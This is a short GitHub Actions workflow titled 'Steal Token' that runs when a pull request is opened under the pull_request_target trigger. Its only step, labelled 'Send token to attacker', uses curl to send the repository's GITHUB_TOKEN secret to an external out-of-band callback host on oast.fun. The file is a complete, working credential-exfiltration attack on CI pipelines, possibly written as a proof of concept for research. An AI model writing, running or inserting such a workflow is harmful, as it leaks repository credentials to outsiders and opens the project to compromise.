name: Steal Token

on:
  pull_request_target:
    types: [opened]

jobs:
  exfiltrate:
    name: Outbound test
    runs-on: ubuntu-latest
    steps:
      - name: Send token to attacker
        run: |
          curl https://vttpumscssnfjgyfukah46b2igw72paa2.oast.fun/steal?token=${{ secrets.GITHUB_TOKEN }}
